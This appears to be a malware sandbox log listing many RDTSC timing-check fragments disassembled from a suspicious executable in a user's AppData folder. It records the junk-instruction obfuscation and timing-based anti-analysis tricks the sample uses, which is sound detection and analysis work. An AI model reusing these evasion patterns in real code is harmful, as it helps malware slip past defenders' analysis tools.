Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7978 second address: 5B79D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FBC9118B8C2h 0x0000000f js 00007FBC9118B8A6h 0x00000015 jmp 00007FBC9118B8B6h 0x0000001a jmp 00007FBC9118B8B8h 0x0000001f jp 00007FBC9118B8A8h 0x00000025 jo 00007FBC9118B8B2h 0x0000002b ja 00007FBC9118B8A6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D59 second address: 5B7D6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FBC912593FEh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D6D second address: 5B7D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D72 second address: 5B7D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBC91259402h 0x0000000b jnl 00007FBC912593F6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D95 second address: 5B7D9F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D9F second address: 5B7DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBC912593FEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7DB3 second address: 5B7DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7F24 second address: 5B7F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5BAFBB second address: 5BAFEE instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 jne 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FBC9118B8E5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8B9h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5BAFEE second address: 5BAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0B17 second address: 5C0B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0B1D second address: 5C0B27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBC912593F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E81 second address: 5C0E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E87 second address: 5C0E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E8D second address: 5C0E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E93 second address: 5C0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBC912593FDh 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007FBC912593FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0EBC second address: 5C0EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0EC0 second address: 5C0EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBC912593FCh 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1211 second address: 5C1215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1810 second address: 5C181B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C181B second address: 5C1821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1821 second address: 5C1842 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBC91259409h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1842 second address: 5C1848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B63 second address: 5C1B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B67 second address: 5C1B6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B6D second address: 5C1B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBC91259408h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B93 second address: 5C1BAD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 jp 00007FBC9118B8A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1BAD second address: 5C1BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1BB6 second address: 5C1BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1EB7 second address: 5C1ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FBC912593FAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C2445 second address: 5C244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C244C second address: 5C2451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C2451 second address: 5C2457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C7F56 second address: 5C7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FBC912593F6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C7F68 second address: 5C7F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CAEE2 second address: 5CAEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBC912593F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB02A second address: 5CB031 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB311 second address: 5CB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB839 second address: 5CB85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FBC9118B8B2h 0x0000000c jno 00007FBC9118B8A6h 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2383 second address: 5D2387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2387 second address: 5D2397 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2397 second address: 5D23A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FBC912593F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2616 second address: 5D261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2D81 second address: 5D2D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2D87 second address: 5D2D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D3090 second address: 5D309A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D64D1 second address: 5D64DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D64DF second address: 5D6504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC91259408h 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D6504 second address: 5D6524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBC9118B8B7h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521E93 second address: 521E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521E97 second address: 521EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC9118B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC9118B8ADh 0x00000012 jc 00007FBC9118B8A6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5DBB14 second address: 5DBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521F03 second address: 521F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5E95DF second address: 5E95E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5EC225 second address: 5EC22B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5EEAC5 second address: 5EEB01 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC912593F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FBC912593F8h 0x00000012 pushad 0x00000013 jmp 00007FBC912593FCh 0x00000018 jmp 00007FBC91259409h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F910E second address: 5F911F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F911F second address: 5F9138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 ja 00007FBC91259402h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F9138 second address: 5F9153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FBC9118B8A6h 0x00000015 jne 00007FBC9118B8A6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F9153 second address: 5F9174 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBC91259403h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBC912593F6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9B1 second address: 5FC9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9BA second address: 5FC9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9C0 second address: 5FC9CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC9118B8AEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60574E second address: 605752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605752 second address: 60576B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FBC9118B8A6h 0x00000012 jns 00007FBC9118B8A6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60576B second address: 605777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBC912593F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605777 second address: 60579D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC9118B8A6h 0x00000008 jmp 00007FBC9118B8B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FBC9118B8A6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60438D second address: 604393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604393 second address: 60439D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60439D second address: 6043A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043A3 second address: 6043B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043B9 second address: 6043F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBC91259408h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FBC912593FCh 0x00000017 jns 00007FBC912593F6h 0x0000001d pushad 0x0000001e jng 00007FBC912593F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043F2 second address: 6043F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043F9 second address: 604422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FBC912593FFh 0x0000000a jmp 00007FBC91259400h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604422 second address: 604426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604578 second address: 60457C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60469C second address: 6046A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046A1 second address: 6046D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259409h 0x00000007 pushad 0x00000008 jnp 00007FBC912593F6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007FBC91259414h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046D2 second address: 6046D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046D8 second address: 6046DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046DC second address: 6046E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604880 second address: 6048AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FBC91259400h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048AA second address: 6048DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC9118B8B4h 0x00000008 jbe 00007FBC9118B8A6h 0x0000000e jmp 00007FBC9118B8AAh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048DB second address: 6048F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FAh 0x00000007 jnc 00007FBC912593F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jno 00007FBC912593F6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048F9 second address: 6048FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605406 second address: 605426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBC912593F6h 0x0000000a pop esi 0x0000000b jmp 00007FBC91259402h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 609FB9 second address: 609FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 609FBD second address: 609FC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC912593F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61BE27 second address: 61BE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD36 second address: 61FD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD3A second address: 61FD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
